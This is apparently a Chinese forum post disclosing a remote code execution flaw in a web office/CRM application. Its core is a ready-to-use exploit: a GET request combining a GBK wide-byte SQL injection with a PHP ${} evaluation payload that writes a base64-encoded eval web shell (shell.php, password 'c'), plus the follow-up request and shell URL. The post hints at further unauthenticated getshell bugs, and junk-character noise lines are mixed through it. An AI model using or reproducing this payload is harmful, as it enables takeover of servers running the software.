此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
6 i: N0 a4 a# v V% g
7 {8 u# U! ?5 J3 x- y
9 r% c; e, e; U3 j7 V& LEXP:
; X4 P9 p' K" D/ ` - z4 x7 R3 ?! ?6 L3 h" @
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
( g# }& }* E% F' b3 [ 9 H" a% N( ]% m3 J0 n
第二步: [GET]http://site/general/email/index.php
8 U( c& e+ L+ b `4 i" }2 M( q4 t
' H6 U7 L$ W6 z {; _) H1 F- LSHELL: http://site/general/email/shell.php 密码C
. {6 O, r/ [! D- }$ V : g9 g% V' \1 }- w: w3 C a1 z
: c' h" ?, i2 M0 s- a) ?
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好0 J' } K; Y: y# e! w F
2 ?, s0 ?& P1 M4 K$ Y有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
5 a8 I5 z }" ^
' N' X# q1 x" M
; w2 N8 N4 \; T/ | |
发表于 2013-2-4 16:19:29
收藏
支持
反对